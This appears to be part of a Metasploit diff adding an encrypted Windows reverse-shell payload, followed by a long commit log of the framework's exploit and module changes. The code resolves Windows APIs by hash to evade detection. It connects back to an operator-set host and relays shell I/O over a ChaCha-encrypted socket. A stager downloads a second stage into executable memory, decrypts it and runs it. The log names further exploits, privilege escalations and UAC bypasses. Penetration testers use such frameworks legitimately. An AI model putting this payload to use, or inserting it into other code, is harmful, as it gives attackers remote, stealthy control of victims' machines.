+        int buf_size = 512;
+        int new_key = 0;
+        DWORD bytes_received = 0;
+        FuncSleep Sleep = (FuncSleep) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'Sleep')}); // hash('kernel32.dll', 'Sleep') -> 0xe035f044
+        FuncSend SendData = (FuncSend) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'send')}); // hash('ws2_32.dll', 'send') -> 0x5f38ebc2
+        FuncRecv RecvData = (FuncRecv) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'recv')}); // hash('ws2_32.dll', 'recv') -> 0x5fc8d902
+        FuncReadFile ReadFile = (FuncReadFile) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'ReadFile')}); // hash('kernel32.dll', 'ReadFile') -> 0xbb5f9ead
+        FuncWriteFile WriteFile = (FuncWriteFile) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'WriteFile')}); // hash('kernel32.dll', 'WriteFile') -> 0x5bae572d
+        FuncExitProcess ExitProcess = (FuncExitProcess) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'ExitProcess')}); // hash('kernel32.dll', 'ExitProcess') -> 0x56a2b5f0
+        FuncPeekNamedPipe PeekNamedPipe = (FuncPeekNamedPipe) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'PeekNamedPipe')}); // hash('kernel32.dll', 'PeekNamedPipe') -> 0xb33cb718
+        FuncVirtualFree VirtualFree = (FuncVirtualFree) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'VirtualFree')}); // hash('kernel32.dll', 'VirtualFree') -> 0x300f2f0b
+
+        SecureZeroMemory(buf, buf_size);
+        UINT term_stat = ExitProc();
+        char init_key[] = { #{format_ds_opt(datastore['ChachaKey'])} };
+        char init_nonce[] = { #{format_ds_opt(datastore['ChachaNonce'])} };
+        char *key = init_key;
+        char *nonce = init_nonce;
+
+        chacha_ctx ctx;
+        chacha_keysetup(&ctx, key, 256, 96);
+        chacha_ivsetup(&ctx, nonce);
+
+        do
+        {
+          if(new_key == 0)
+          {
+            char *stream = get_new_key(s);
+            if(stream == NULL)
+            {
+              ExitProcess(term_stat);
+            }
+
+            char *res = chacha_data(stream, 44, &ctx);
+            key = res + 12;
+            nonce = res;
+            new_key = 1;
+
+            chacha_keysetup(&ctx, key, 256, 96);
+            chacha_ivsetup(&ctx, nonce);
+          }
+
+          if(PeekNamedPipe(out, NULL, 0, NULL, &data, NULL) && data > 0)
+          {
+            if(!ReadFile(out, buf, buf_size-1, &bytes_received, NULL))
+            {
+              ExitProcess(term_stat);
+            }
+            char *cmd = chacha_data(buf, bytes_received, &ctx);
+            SendData(s, cmd, bytes_received, 0);
+            SecureZeroMemory(buf, buf_size);
+            VirtualFree(cmd, bytes_received+1, MEM_RELEASE);
+          }
+          else
+          {
+            DWORD bytes_written = 0;
+
+            bytes_received = RecvData(s, buf, buf_size-1, 0);
+            if(bytes_received > 0)
+            {
+              char *dec_cmd = chacha_data(buf, bytes_received, &ctx);
+              WriteFile(in, dec_cmd, bytes_received, &bytes_written, NULL);
+              SecureZeroMemory(buf, buf_size);
+              VirtualFree(dec_cmd, bytes_received+1, MEM_RELEASE);
+            }
+          }
+          Sleep(100);
+        } while(bytes_received > 0);
+      }
+
+    ^
+  end
+
+  #
+  # ExecutePayload acts as the main function of the c program
+  #
+  def get_load_library(host, port)
+    %Q^
+      void ExecutePayload(VOID)
+      {
+        FuncLoadLibraryA LoadALibrary;
+        FuncWSASocketA WSASock;
+        FuncWSACleanup WSACleanup;
+        FuncConnect ConnectSock;
+        UINT proc_term_status = ExitProc();
+        SOCKET conn_socket = INVALID_SOCKET;
+        FuncExitProcess ExitProcess = (FuncExitProcess) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'ExitProcess')}); // hash('kernel32.dll', 'ExitProcess') -> 0x56a2b5f0
+        FuncCloseHandle CloseHandle = (FuncCloseHandle) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'CloseHandle')}); // hash('kernel32.dll', 'CloseHandle') -> 0x528796c6
+
+        char ip[] = { #{host} };
+        char port[] = { #{port} };
+        char ws2[] = { 'w', 's', '2', '_', '3', '2', '.', 'd', 'l', 'l', 0 };
+
+        LoadALibrary = (FuncLoadLibraryA) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'LoadLibraryA')}); // hash('kernel32.dll', 'LoadLibrary') -> 0x0726774C
+        LoadALibrary((LPTSTR) ws2);
+      ^
+  end
+
+  def call_init_winsock
+    %Q^
+        init_winsock();
+    ^
+  end
+
+  def start_comm(uuid)
+    %Q^
+        struct addrinfo *info = NULL;
+        info = conn_info_setup(ip, port);
+        FuncSend SendData = (FuncSend) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'send')}); // hash('ws2_32.dll', 'send') -> 0x5f38ebc2
+        WSASock = (FuncWSASocketA) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'WSASocketA')}); // hash('ws2_32.dll', 'WSASocketA') -> 0xe0df0fea
+        conn_socket = WSASock(info->ai_family, info->ai_socktype, info->ai_protocol, NULL, 0, 0);
+
+        if(conn_socket == INVALID_SOCKET)
+        {
+          ExitProcess(proc_term_status);
+        }
+
+        ConnectSock = (FuncConnect) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'connect')}); // hash('ws2_32.dll', 'connect') -> 0x6174a599
+        if(ConnectSock(conn_socket, info->ai_addr, info->ai_addrlen) == SOCKET_ERROR)
+        {
+          ExitProcess(proc_term_status);
+        }
+
+        char uuid[] = { #{format_ds_opt(uuid)} };
+        SendData(conn_socket, uuid, 16, 0);
+
+      ^
+   end
+
+  def single_comm
+    %Q^
+        HANDLE *comm_handles = init_process(conn_socket);
+        communicate(*(comm_handles), *(comm_handles+1), conn_socket);
+
+        CloseHandle(*comm_handles);
+        CloseHandle(*(comm_handles + 1));
+        WSACleanup = (FuncWSACleanup) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'WSACleanup')}); // hash('ws2_32.dll', 'WSACleanup') -> 0xf44a6e2b
+      }
+    ^
+  end
+
+  def stager_comm
+    reg = self.arch_to_s.eql?('x86') ? 'edi' : 'rdi'
+    inst = self.arch_to_s.eql?('x86') ? 'movl' : 'movq'
+
+    %Q^
+        FuncRecv RecvData = (FuncRecv) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'recv')}); // hash('ws2_32.dll', 'recv') -> 0x5fc8d902
+        unsigned int stage_size;
+        int recvd = RecvData(conn_socket, (char *) &stage_size, 4, 0);
+        if(recvd != 4)
+        {
+          ExitProcess(proc_term_status);
+        }
+
+        FuncVirtualAlloc VirtualAlloc = (FuncVirtualAlloc) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'VirtualAlloc')}); // hash('kernel32.dll', 'VirtualAlloc') -> 0xe553a458
+        register char *received = VirtualAlloc(NULL, stage_size + 1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+
+        int recv_stg = RecvData(conn_socket, received, stage_size, 0);
+        if(recv_stg != stage_size)
+        {
+          ExitProcess(proc_term_status);
+        }
+
+        char key[] = { #{format_ds_opt(datastore['ChachaKey'])} };
+        char nonce[] = { #{format_ds_opt(datastore['ChachaNonce'])} };
+
+        chacha_ctx dec_ctx;
+        chacha_keysetup(&dec_ctx, key, 256, 96);
+        chacha_ivsetup(&dec_ctx, nonce);
+        chacha_data(received, stage_size + 1, &dec_ctx);
+
+        // hand the socket to the stage
+        asm("#{inst} %0, %%#{reg}"
+            :
+            : "r" (conn_socket)
+            : "%#{reg}"
+        );
+
+        // call the stage
+        void (*func)() = (void(*)())received;
+        func();
+      }
+    ^
+  end
+
+  def exec_payload_stage
+    reg = self.arch_to_s.eql?('x86') ? 'edi' : 'rdi'
+    inst = self.arch_to_s.eql?('x86') ? 'movl' : 'movq'
+
+    %Q^
+     void ExecutePayload()
+     {
+       SOCKET conn_socket = INVALID_SOCKET;
+
+       asm("#{inst} %%#{reg}, %0"
+           :
+           :"m"(conn_socket)
+       );
+
+       HANDLE *comm_handles = init_process(conn_socket);
+       communicate(*(comm_handles), *(comm_handles+1), conn_socket);
+     }
+    ^
+  end
+end
+end
--- a/Show More
+++ b/Show More
Author	SHA1	Message	Date
Metasploit	18233b3cb9	automatic module_metadata_base.json update	2020-01-14 11:05:41 -06:00
Metasploit	93f5658fd5	automatic module_metadata_base.json update	2020-01-14 09:25:15 -06:00
Shelby Pace	69e8a658ad	Land #12801 , add WePresent cmd injection module	2020-01-14 09:25:15 -06:00
William Vu	17e84741c2	Land #12821 , exploit/linux/http/webmin_backdoor Moved from exploit/unix/webapp/webmin_backdoor.	2020-01-14 09:25:15 -06:00
William Vu	03d2d5ec02	Land #12820 : Fix #12813 , send_request_cgi change	2020-01-14 09:25:14 -06:00
Metasploit	0cb1bf1783	automatic module_metadata_base.json update	2020-01-13 20:32:15 -06:00
William Vu	5776fe1ddb	Land #12819 : Fix #12813 , Twitter handle correction	2020-01-13 20:24:46 -06:00
Metasploit	ec17337245	automatic module_metadata_base.json update	2020-01-13 18:27:24 -06:00
William Vu	53eda6444f	Land #12813 , Citrix CVE-2019-19781 scanner	2020-01-13 18:19:24 -06:00
Metasploit	58b5d1e5b3	automatic module_metadata_base.json update	2020-01-12 17:26:52 -06:00
Brent Cook	9218612e52	Land #12797 , improve BlueKeep over remote networks	2020-01-12 17:18:09 -06:00
Brent Cook	b4bc8d7f53	Land #12811 , add newline when printing raw payloads to the console	2020-01-12 07:04:04 -06:00
Brent Cook	227d3a1c3e	Land #12812 , update port processing for openvas	2020-01-12 06:55:25 -06:00
Metasploit	17b7abaae4	automatic module_metadata_base.json update	2020-01-10 02:40:45 -06:00
Tim W	b69de3dd8f	Land #12792 , Fix #12791 , check for nil response on connection failure in efs_fmws_userid_bof	2020-01-10 02:32:13 -06:00
Adam Cammack	1f0d2a4730	Land #12806 , Properly invoke bundler in Dockerfile	2020-01-09 13:58:32 -06:00
Metasploit	79f8796e1f	Bump version of framework to 4.17.102	2020-01-09 12:03:11 -06:00
Metasploit	cfc34042a1	automatic module_metadata_base.json update	2020-01-09 09:23:25 -06:00
Tim W	b1e7cc7d71	Land #12804 , add support for macOS in web_delivery	2020-01-09 09:15:26 -06:00
Metasploit	149345e51e	automatic module_metadata_base.json update	2020-01-09 07:38:19 -06:00
Tim W	d5ca458585	Land #12799 , fix python web_delivery when SSL=true	2020-01-09 07:30:08 -06:00
Tim W	57ba133c5f	Land #12779 , Fix #12777 , add PrependSetuid and PrependSetresuid on armle	2020-01-07 00:49:33 -06:00
Brendan Coles	d5bd2bf24e	Land #12788 , Add rds_rds_page_copy_user_priv_esc re-exploitation notes	2020-01-04 12:13:45 -06:00
Brendan Coles	58426a730c	Land #12785 , Fix aux/scanner/telnet/telnet_login prompt parsing regex	2020-01-04 11:45:10 -06:00
Metasploit	34f97ced38	Bump version of framework to 4.17.101	2020-01-02 12:01:20 -06:00
Metasploit	3cb4cfc9ca	automatic module_metadata_base.json update	2019-12-27 04:04:54 -06:00
Brent Cook	f0aa35e447	Land #12712 , add OpenBSD Dynamic Loader chpass privesc	2019-12-27 03:56:50 -06:00
Metasploit	9a12779f80	automatic module_metadata_base.json update	2019-12-26 14:00:42 -06:00
Brent Cook	58f5639aa2	Land #12640 , improve Wordpress check versions Merge remote-tracking branch 'upstream/pr/12640' into upstream-master	2019-12-26 13:49:00 -06:00
Brent Cook	cc7c72567c	Land #12760 , improvements to linux/local/bpf_priv_esc module	2019-12-26 13:45:12 -06:00
Brent Cook	5fab4622ed	Land #12433 , add Metasploit reverse_http handler DoS module	2019-12-26 13:40:29 -06:00
Metasploit	b749893bac	Bump version of framework to 4.17.100	2019-12-26 12:02:09 -06:00
Metasploit	b253577a9d	automatic module_metadata_base.json update	2019-12-23 19:22:04 -06:00
wvu-r7	216bdcf8cf	Land #12754 , ForceExploit for 4.3BSD exploits	2019-12-23 19:13:40 -06:00
Metasploit	ae524a77e1	automatic module_metadata_base.json update	2019-12-23 14:58:08 -06:00
Brent Cook	06b6535606	Land #12524 , update most python code with python 3 compatibility	2019-12-23 14:51:01 -06:00
Metasploit	232a8797e0	automatic module_metadata_base.json update	2019-12-22 09:31:31 -06:00
h00die	37adfc3860	Land #12744 , rds lpe updates and improvements	2019-12-22 09:23:33 -06:00
Metasploit	9f1bf07b63	automatic module_metadata_base.json update	2019-12-21 14:59:11 -06:00
h00die	34e4c08bba	Land #12701 linux priv esc on reptile_cmd rootkit	2019-12-21 14:51:11 -06:00
h00die	8b036d7ab1	Land #12750 , haKCers.txt banner update	2019-12-21 06:38:13 -06:00
h00die	b95e884954	Land #12707 , more module docs	2019-12-21 06:16:20 -06:00
Metasploit	3460a9255a	Bump version of framework to 4.17.99	2019-12-19 12:06:19 -06:00
Metasploit	16186bba9e	automatic module_metadata_base.json update	2019-12-18 15:53:08 -06:00
Shelby Pace	5a196a90f5	Land #12693 , add Comahawk privilege escalation	2019-12-18 15:44:02 -06:00
Metasploit	00851f9ffb	automatic module_metadata_base.json update	2019-12-18 12:24:03 -06:00
wvu-r7	967165d76a	Land #12742 , bsd/vax/shell_reverse_tcp style fix	2019-12-18 12:16:05 -06:00
Metasploit	5f24f3b38d	automatic module_metadata_base.json update	2019-12-16 20:28:27 -06:00
Brent Cook	d21f798e43	Land #12735 , Add smcintyre-r7 to the .mailmap file	2019-12-16 17:53:12 -06:00
Metasploit	927ff86b8b	automatic module_metadata_base.json update	2019-12-16 17:51:20 -06:00
Metasploit	82b22925e4	automatic module_metadata_base.json update	2019-12-16 11:50:40 -06:00
Brent Cook	e3d5b9ef2f	Land #12643 , add additional example exploit modules	2019-12-16 11:34:46 -06:00
Brent Cook	25055c6cc9	Land #12651 , add OpenMRS deserialization exploit	2019-12-16 11:31:30 -06:00
Brent Cook	ef15adb4a3	Land #12732 , lock rubygems for Travis and Docker unbreaking builds	2019-12-16 11:31:30 -06:00
Metasploit	764d446401	automatic module_metadata_base.json update	2019-12-16 02:30:36 -06:00
Christophe De La Fuente	f8f34a9300	Land #12725 , Bash profile persistence module	2019-12-16 02:22:25 -06:00
Metasploit	24ff1d66bb	automatic module_metadata_base.json update	2019-12-15 06:18:10 -06:00
h00die	a6eeec907c	Land #12727 , netfilter_priv_esc_ipv4 improvements	2019-12-15 06:09:56 -06:00
Metasploit	09ba508138	automatic module_metadata_base.json update	2019-12-15 05:36:26 -06:00
h00die	05fe42ec63	Land #12697 , module docs	2019-12-15 05:27:16 -06:00
Metasploit	e6271273eb	automatic module_metadata_base.json update	2019-12-13 16:52:21 -06:00
h00die	19f6f473f1	Land #12661 , more docs	2019-12-13 16:43:55 -06:00
Tim W	7b45543471	Land #12714 , fix encrypted_shell warning	2019-12-12 23:44:54 -06:00
Metasploit	c353470a99	automatic module_metadata_base.json update	2019-12-12 15:30:12 -06:00
bwatters-r7	7d239ed1b6	Land #12391 , Add shellcode_inject post module Merge branch 'land-12391' into upstream-master	2019-12-12 15:22:18 -06:00
Metasploit	96dce0c39e	automatic module_metadata_base.json update	2019-12-12 13:22:03 -06:00
Christophe De La Fuente	1d62fdf423	Land #12486 , Small changes to the host_header_injection aux module	2019-12-12 13:13:54 -06:00
Metasploit	87f7ce9172	Bump version of framework to 4.17.98	2019-12-12 12:04:41 -06:00
Shelby Pace	84485f0a4f	Land #12699 , add payload uuid/temp file fixes	2019-12-12 10:51:10 -06:00
Metasploit	c66346c354	automatic module_metadata_base.json update	2019-12-12 10:38:14 -06:00
Jeffrey Martin	415c5c2185	Land #12363 , Adding Chrome Debugger Gather Auxiliary Module	2019-12-12 10:36:32 -06:00
Metasploit	aa1d4a47b3	automatic module_metadata_base.json update	2019-12-12 09:28:11 -06:00
Brendan Coles	380bf1a5c2	Land #12696 , Add AKA references to several modules	2019-12-12 09:20:01 -06:00
Metasploit	b99c4d4997	automatic module_metadata_base.json update	2019-12-11 14:02:40 -06:00
wvu-r7	732ecc0e19	Land #12703 , RHOST(S) and RPORT for SSH mixin Also fixes a typo in exploit/linux/ssh/solarwinds_lem_exec.	2019-12-11 13:54:20 -06:00
Metasploit	f1813b8c34	automatic module_metadata_base.json update	2019-12-11 00:53:31 -06:00
Brendan Coles	11a04e5840	Land #12662 , Update post/multi/gather/gpg_creds to support GPG v2.1+ keys	2019-12-11 00:44:50 -06:00
Metasploit	9ee92978dc	automatic module_metadata_base.json update	2019-12-10 12:22:22 -06:00
Shelby Pace	a10148fbb0	Land #12364 , add vBulletin widgetconfig RCE	2019-12-10 12:14:10 -06:00
Jeffrey Martin	925a82234c	Revert "Land #12695 , Fix incorrect check status for aux modules returned by search" This reverts commit `7bac2f7618`, reversing changes made to `049986c59a`.	2019-12-10 10:26:47 -06:00
Jeffrey Martin	d8cc74ba7a	Land #12695 , Fix incorrect check status for aux modules returned by search	2019-12-10 10:12:52 -06:00
Adam Galway	18e9f86743	Land 12680, fixes small typo in dns_fuzzer.rb	2019-12-10 09:59:38 -06:00
Metasploit	0bdc2efd4c	automatic module_metadata_base.json update	2019-12-10 09:45:28 -06:00
Metasploit	d4b39a1386	automatic module_metadata_base.json update	2019-12-09 21:06:30 -06:00
Metasploit	5c07e1f1e0	automatic module_metadata_base.json update	2019-12-09 20:57:28 -06:00
William Vu	7bf3f1fae3	Land #12666 , bypassuac_silentcleanup %WINDIR% fix	2019-12-09 20:49:42 -06:00
Metasploit	3c52709cf0	automatic module_metadata_base.json update	2019-12-09 20:22:24 -06:00
William Vu	d9911322ba	Land #12577 , once more with feeling	2019-12-09 20:10:34 -06:00
William Vu	299bd5f175	Land #12614 , post/multi/gather/ssh_creds fixes	2019-12-09 20:06:43 -06:00
Metasploit	802b4eb633	automatic module_metadata_base.json update	2019-12-09 19:58:23 -06:00
William Vu	c8d5513c08	Land #12577 , redis_unauth_exec fixes	2019-12-09 19:50:15 -06:00
Metasploit	6879b9fc20	automatic module_metadata_base.json update	2019-12-09 13:13:17 -06:00
Brent Cook	aff6c5cf2b	Land #12647 , add back executable check to msftidy	2019-12-09 13:05:27 -06:00
Brent Cook	39a2b60578	Land #12679 , remove never-used file_local_digest* methods	2019-12-09 12:52:14 -06:00
Brent Cook	1cc7444ba2	Land #12673 , fix error in rpc_creds method	2019-12-09 12:50:01 -06:00
Metasploit	7355cb6d3f	automatic module_metadata_base.json update	2019-12-09 09:03:17 -06:00
Brent Cook	319ebf7f34	Land #12686 , raise BadCharError instead of EncodingError with xor_dynamic encoder	2019-12-09 08:49:16 -06:00
Brent Cook	dd69848dbb	Land #12689 , add iis_internal_ip references	2019-12-09 08:47:13 -06:00
Metasploit	cb288a19c3	automatic module_metadata_base.json update	2019-12-09 04:19:54 -06:00
Tim W	097ac05b65	Land #12446 , add powershell AMSI bypass to web_delivery	2019-12-09 04:11:27 -06:00
Brent Cook	8b3503e5c1	Land #12675 , update kiwi to mimikatz 2.2.0 20191125	2019-12-06 15:41:03 -06:00
Brent Cook	f8f65ba78b	Land #12676 , update cops to match new names	2019-12-06 12:35:16 -06:00
Brent Cook	11ecbc89fa	Land #12668 , various Meterpreter fixes	2019-12-06 10:32:15 -06:00
h00die	ccbdbe037c	Land #12632 , lots more module docs	2019-12-05 14:02:27 -06:00
Metasploit	e8f4abcb25	Bump version of framework to 4.17.97	2019-12-05 12:06:29 -06:00
Adam Galway	0aab5ae953	Land #12627 , alter scanner info method for check	2019-12-04 09:05:21 -06:00
Metasploit	53f45a55e4	automatic module_metadata_base.json update	2019-12-03 19:31:59 -06:00
h00die	5afb381c44	Land #12646 , ms04_007 reliability and stability updates	2019-12-03 19:23:58 -06:00
Metasploit	10fee655a4	automatic module_metadata_base.json update	2019-12-03 19:18:42 -06:00
h00die	92962ff249	Land #12656 , reliability and stability notes for ms06_040	2019-12-03 19:10:38 -06:00
Brent Cook	efe7c9212d	Land #12659 , make faraday spec slightly less strict	2019-12-03 14:28:14 -06:00
Brent Cook	4f16efbee3	Land #12655 , update cert generation to not generate years in the past	2019-12-03 13:53:28 -06:00
Brent Cook	1a4543828c	Land #12658 , pin faraday to avoid warnings from octokit on start	2019-12-03 13:51:48 -06:00
Brent Cook	0311b780b1	Land #12657 , suggest local exploit as better replacement for meterpreter scripts	2019-12-03 11:25:10 -06:00
Metasploit	0f970adfe8	automatic module_metadata_base.json update	2019-12-01 10:22:18 -06:00
dwelch-r7	0ab69e09bd	Land #12503 , Add exploit module for Ajenti 2.1.31	2019-12-01 10:14:04 -06:00
Metasploit	35397dbda6	automatic module_metadata_base.json update	2019-12-01 09:50:29 -06:00
dwelch-r7	23cff84639	Land #12422 , Add module for enumerating git keys	2019-12-01 09:41:15 -06:00
Metasploit	5851ab53f6	automatic module_metadata_base.json update	2019-11-29 06:58:51 -06:00
Brendan Coles	eebfd2c83f	Land #12644 , Fix iis75_ftpd_iac_bof crash when returned banner is nil	2019-11-29 06:50:52 -06:00
Metasploit	041388e5b7	automatic module_metadata_base.json update	2019-11-29 04:21:51 -06:00
Christophe De La Fuente	cbdc6ec4b3	Land #12555 - Wordpress Plainview Activity Monitor RCE	2019-11-29 04:13:49 -06:00
Metasploit	5b5f80e8ab	Bump version of framework to 4.17.96	2019-11-28 12:05:51 -06:00
Brent Cook	c87be6a3d1	Land #12622 , add aux docs for dlsw_leak_capture and ftpbounce	2019-11-26 14:48:21 -06:00
Metasploit	6c0c143e7e	automatic module_metadata_base.json update	2019-11-26 12:44:55 -06:00
dwelch-r7	49258bf13c	Land #12629 , fix typo in splunk upload app exec	2019-11-26 12:28:14 -06:00
Adam Cammack	9022f39013	Land #12623 , Stub tests for compiled payloads	2019-11-26 10:07:00 -06:00
Metasploit	d41ecf9882	automatic module_metadata_base.json update	2019-11-25 18:45:48 -06:00
William Vu	2d372c143c	Land #12625 , DOUBLEPULSAR exploit print updates	2019-11-25 18:37:52 -06:00
Metasploit	276a653257	automatic module_metadata_base.json update	2019-11-25 13:13:55 -06:00
dwelch-r7	5e1632a8b1	Land #12475 , enhancements to brute_dirs module	2019-11-25 13:05:44 -06:00
Metasploit	7707f910d5	automatic module_metadata_base.json update	2019-11-25 10:33:10 -06:00
Adam Cammack	c2a0ccc6ed	Land #12618 , Add tests for the JJS payloads	2019-11-25 10:24:05 -06:00
h00die	36b746daac	Land #12607 a bunch of aux docs	2019-11-23 12:03:07 -06:00
Metasploit	2eea5e0cf2	Bump version of framework to 4.17.95	2019-11-21 12:05:58 -06:00
Jeffrey Martin	0394a7b0d1	remove crypto object not available in 4.x yet	2019-11-21 09:45:22 -06:00
Brent Cook	50059fe9c9	Land #12530 , add encrypted, compilable shell payloads	2019-11-21 09:23:01 -06:00
Metasploit	a86bca1491	automatic module_metadata_base.json update	2019-11-20 14:26:12 -06:00
bwatters-r7	0295d98bec	Land #12544 , Add bind/reverse jjs unix cmd payloads Merge branch 'land-12544' into upstream-master	2019-11-20 14:16:43 -06:00
Metasploit	5c4f3fe3a9	automatic module_metadata_base.json update	2019-11-19 10:51:41 -06:00
Metasploit	0c6ff6ae2e	automatic module_metadata_base.json update	2019-11-19 10:43:26 -06:00
bwatters-r7	a2a14fac5b	Land #12602 , scanners: fix a couple of typos Merge branch 'land-12602' into upstream-master	2019-11-19 10:43:25 -06:00
Metasploit	08f9182657	automatic module_metadata_base.json update	2019-11-18 17:47:04 -06:00
Brent Cook	608ae62363	Land #12601 , don't store public-only ssh creds	2019-11-18 17:39:01 -06:00
Metasploit	d1be23d469	automatic module_metadata_base.json update	2019-11-18 17:22:45 -06:00
Brent Cook	4677ed63d7	Land #12479 , fix error running sap_mgmt_con_brute_login	2019-11-18 17:22:44 -06:00
Metasploit	c967dcc6aa	automatic module_metadata_base.json update	2019-11-18 16:23:40 -06:00
Metasploit	a305534ff8	automatic module_metadata_base.json update	2019-11-18 15:14:36 -06:00
Brent Cook	f039174abe	Land #12516 , Add Windows Escalate UAC Protection Bypass	2019-11-18 15:06:16 -06:00
Metasploit	d5ce294e59	automatic module_metadata_base.json update	2019-11-18 10:31:38 -06:00
bwatters-r7	2f8df09425	Land #12588 , Remove unsupported session type Merge branch 'land-12588' into upstream-master	2019-11-18 10:22:40 -06:00
Metasploit	5f8605f3e0	automatic module_metadata_base.json update	2019-11-18 02:20:36 -06:00
Brent Cook	48ee239594	Land #12585 , use post API for shell compat in enum_hostfile	2019-11-18 02:12:50 -06:00
Metasploit	a5f5d49b6b	automatic module_metadata_base.json update	2019-11-18 01:57:05 -06:00
Brent Cook	94eaa9d23f	Land #12494 , Add Windows backup system sdclt uac bypass module	2019-11-18 01:49:00 -06:00
Metasploit	f3ac1818c2	automatic module_metadata_base.json update	2019-11-15 11:37:30 -06:00
William Vu	65b7a14fbb	Land #12581 , additional BlueKeep doc fixes	2019-11-15 11:29:17 -06:00
Metasploit	2fedeab8c6	automatic module_metadata_base.json update	2019-11-15 05:11:26 -06:00
Metasploit	5e3263358b	automatic module_metadata_base.json update	2019-11-14 15:30:04 -06:00
William Vu	f9ff030bd2	Land #12575 , 2008 caveat note in BlueKeep exploit	2019-11-14 15:21:53 -06:00
William Vu	e60a1ef6c9	Land #12567 , tribute banner for the console	2019-11-14 14:49:04 -06:00
Metasploit	46f38131c6	Bump version of framework to 4.17.94	2019-11-14 12:51:42 -06:00